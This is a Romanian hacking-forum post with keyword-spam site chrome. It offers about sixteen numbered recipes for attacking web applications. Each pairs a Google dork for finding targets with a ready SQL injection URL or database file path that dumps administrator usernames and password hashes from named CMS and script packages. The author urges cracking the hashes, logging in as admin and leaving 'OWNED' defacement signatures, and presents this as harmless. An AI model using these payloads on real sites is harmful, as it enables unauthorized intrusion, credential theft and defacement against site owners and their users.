www.Hacking-Romania.com
Hacking, gaby hacker team, programe hack, radmin hack, hi5 hack, hack the west, hacking romania, hacking stuff, hacking tools, 1 hack, 1st hacks, 2 hack, 2 hacks, 3 hack, 3 hacks, 3000 hack, 3004 hack, 4 hack, 4 hacks, 55 hack, 6 hack, 6 hacks, 7 hack, 7 hacks, 9 hack, 9dragons hack, a hack, adventure quest hack, aim hack, alz hack, and hacks, best hack, blue hack, bots hack, bots hacks, buy hack, cabal online hack, chaos hacks, cheat engine hack, cheat hack, cheats and hacks, cheats hacks, city hack, club hack, combo hack, conquer hacks, conquer online hack, conquer online hacks, conquer speed hack, conquiztador hack, counter strike 1.6 hack, damage hack, de hack, download hack, download hack for, dragonfable hack, dragonfable hacks, drakkarious hack, exp hack, flyff hack, free hack, free hacks, game hack, game hacks, garena exp hack, gladiatus hack, gm hack, gold hack, gunz hack, hack, hack 5, hack a pc, hack a site, hack a website, hack blog, hack conquer, hack counter strike, hack crack, hack cs, hack cs 1.6, hack dvd, hack email, hack forum, hack hunter, hack id, hack info, hack it, hack mess, hack muonline, hack net, hack password, hack passwords, hack pc, hack pdf, hack programs, hack site, hack sites, hack soft, hack software, hack team, hack the game, hack this, hack website, hack windows xp, hack world, hack xp, hacked, hacking, hacking game, hacking programs, hacking software, hacking tutorials, hacks, how hack, how to hack, icon hack, last chaos hack, last chaos hacks, life hack, lineage 2 hack, lineage 2 hacks, linux hack, lvl hack, maplestory hacks, mobile hack, multi hack 3.0, mybrute hack, naruto arena hack, naruto arena hacks, one hit kill hack, online hacks, perfect world hacks, pool hack, programe hack, resolution hack, resource hack, roll hack, royal hack, silkroad hack, source hack, speed hack, speed hacks, super hack, the west hack, warrock hack, warrock hacks, web hack, xpango hack, lockerz forum 		Lista Forumurilor Pe Tematici
www.Hacking-Romania.com | Reguli | Inregistrare | Login

POZE WWW.HACKING-ROMANIA.COM

Nu sunteti logat. 		Nou pe simpatie:
Alexandra21 pe Simpatie
Femeie
22 ani
Calarasi
cauta Barbat
23 - 52 ani
www.Hacking-Romania.com / Tutoriale Hack RO / Atacul asupra paginilor Web  
Autor
Mesaj Pagini: 1
aviss7
NOVICE

Inregistrat: acum 16 ani
Postari: 63
o sa posteez cateva metode pt a ataca pagini web (obtinerea password-ului adrministratorului)
aici puteti dezencripta hashurile in md5 :
sau ... cu programe ... uitativa in san google
DACA REUSITI SA SPARGETI VREO PAG ... NU VA COMPORTATI CA INFECTII AIA DE LAMERI ... NU STERGETI SI NU FACETI RAU ... LASATI UN "OWNED BY ... " SI O IMAGINE / UN AVATAR ... SI EVENTUAL LASATI SI ADRESA VOASTRA DE EMAIL (IN CAZUL IN CARE SUNTETI BUNI IN HACKING) ... DACA NU STIATI MULTI HACKERI AJUNG ANGAJATI IN SECURITATE LA PAGINILE ATACATE SAU LA FIRME MAI MARI ...

1.
-deschideti google
-in spatiul de cautare puneti : allinurl:links.asp?action=whatsnew si apar cateva pagini ... Very Happy
-apoi alegeti o pagina (ex:http://www.victima.com/weblinks/links.asp)
-toate paginile pe care le gasiti ar trebui sa se termine in /links.asp ...ce trebuie sa faceti e sa stergeti links.asp (sa ramana doar) apoi adaugati urmatorul cod : links.asp?action=reporterror&linkID=221%20union%20 select+0,administrativepassword,0,0,0,0,0,0,0+from +config
ar arata cam asa : select+0,administrativepassword,0,0,0,0,0,0,0+from +config
daca dati enter si a mers , apare REPORT AN ERROR ,putin mai jos link tittle:"aici un cuvant"
si mai jos email addres: si un spatiu liber
-passwordul e cuvantul de la link tittle: ... asa ca dati click in admin si introduceti passwordul ... asa ca acum aveti control total la pagina ...
(recomand sa nu faceti nimic rau ... hackerii adevarati de obicei lasa semnatura lor , care poate fi un desen , si un mesaj pt admin spunandu-i de problema paginii )

aici va las un exemplu de pagina hackeata ... nu e prin metoda prin care am posteato eu ... insa sa va faceti o idee de cam cum arata o pagina dupa ce a trecut un hacker pe acolo
inainte era o pagina de hack (prin 2001 erau utile tutorialele de acolo ... insa s-au ocupat tot mai putin de pagina ) ... si acum cand deschizi pagina ... te redirectioneaza la alta pagina (aleasa de hackerul care a atacat pagina)

2.
-in spatiul de cautare in google puneti : : modules.php?name=Statistics Version PHP-Nuke
-odata iesite paginile ... cautam o victima ... si punem urmatorul cod :
daca victima e vulnerabila apare hashul encriptat in md5
un hash poate arata asa : e141f494f13327099c5c6f9bd469a2f6
odata obtinut hashul , il dezencriptam in una din paginile urmatoare , sau cu un program :
odata dezencriptat hashul intram in pagina si adaugam urmatoarele :
ne cere sa introducem userul si passul ... si ... ai intrat ca admin cheers

3.Gamescript
-cautam in google : "Powered by GameSiteScript"
-odata aleasa victima insertam bugul : /index.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0, password,0,0,0,0,0,0+from+members+where+id='1

(ex: password,0,0,0,0,0,0+from+members+where+id='1 )
-daca functioneaza va da userul si passwordul

4.AV Arcade
-in google : "Powered By AV Arcade"
-odata gasita victima : index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20 ava_users%20WHERE%20id=1

(ex:http://www.victima.com/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20 ava_users%20WHERE%20id=1 )
-daca a functionat va da passwordul in md5 ... il dezencriptati si "OWNED"

5.Xt-News
-in google : "Powered by Xt-News"
-odata gasita victima : show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null ,null,null,null,null,null%20FROM%20xtnews_users%20 WHERE%20%20admin=1

(ex : ,null,null,null,null,null%20FROM%20xtnews_users%20 WHERE%20%20admin=1 )
-daca a functionat va da passwordul in md5 ... il dezencriptati si "OWNED"

6.Flash GameScript 1.7
-in google : "Powered by FlashGameScript"
-odata gasita victima : index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+ from+members+where+user_type=2/*
-daca nu functioneaza incercati cu asta : index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr om+members+where+user_type=2/*

(ex : 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+ from+members+where+user_type=2/* )
-daca a functionat va da adminul si passwordul

6.Dvbbs Version 7.1.0 Sp1
-in google : "Powered By Dvbbs Version 7.1.0 Sp1"
-odata aleasa victima : /Data/Dvbbs7.mdb

(ex : )
-daca a functionat downloadam baza de date cu admin si password , emailul adminului si inca cateva chestii ... Very Happy

7.eMeeting Online Dating Software
-in google : allintext:"Home Member Search Chat Room Forum Help/Support privacy policy"
-odata aleasa victima : b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
-daca nu functioneaza probati :
b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

(ex:(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/* )
-daca a functionat va da passul in md5 , il dezencriptati si "OWNED"

8.eSyndiCat Directory
-in google : © 2005-2006 Powered by eSyndiCat Directory Software
-odata aleasa victima : news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
-daca nu functioneaza incercati : page.php?name=-1%27%20union%20select%200,0,0,0,0,0,0,0,0/*

(ex : from%20dir_admins/*)
-daca a functionat va da passul in md5 , il dezencriptati si "OWNED"

9.Expert Advidior
-in google : intitle:"Answer Builder" Ask a question
-odata aleasa victima : /index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3 a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*

(ex :(0x3c623e,username,0x3 a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/* )
-va da passwordul si userul , apoi intrati ca admin din

10.Iblog
-in google : lblog
-odata aleasa victima : /comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1

(ex : UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1)
-daca a functionat ne da adminul si passwordul

11.Mambo com_yanc v.1.4 BETA
-in google : inurl:index.php?option=com_yanc
-odata aleasas victima : index.php?option=com_yanc&Itemid=9999999&listid=99 99999/**/union/**/select/**/name,password/**/from/**/mos_users/*
-daca functioneaza va da passwordul si userul ... (tipul asta de pagini sunt de cumparaturi online )

12.SQL Injection BlogSite Professional
-allintext:"Browse Blogs by Category"
-index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*
-da numele adminului si passwordul in md5 pe care il dezencriptati
(nu mai scriu "in google" si toate alea ... stiti ordinea)

13.SQL Injection bwired
-"Powered by bwired" inurl:?newsID=
-/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
-daca functioneaza da adminul si passwordul

14.SQL Injection Joomla com_gmaps
-Joomla com_gmaps
-index.php?option=com_gmaps&task=viewmap&Itemid=57& mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
-va da adminul si passul in md5 ... il dezencriptati si "OWNED"

15.SQL Injection Mambo Component SimpleFAQ
-inurl:Mambo Component SimpleFAQ V2.11
-mambo/index.php?option=com_simplefaq&task
=answer&Itemid=9999&catid=9999&aid=-1/**/union
/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0/**/from/**/mos_users/*
-daca functioneaza - admin si pass in md5

16.SQL Injection SuperCali Event Calendar
-allintext:"SuperCali Event Calendar"
-index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E70 6870/**/from/**/users/*
-va da adminul si passul in md5 ... dati la manage calendar , puneti datele si "OWNED"

si cam asta a fost tot ... sper sa va fie de folos ...
salut
pus acum 16 ani
   
Pagini: 1  

Mergi la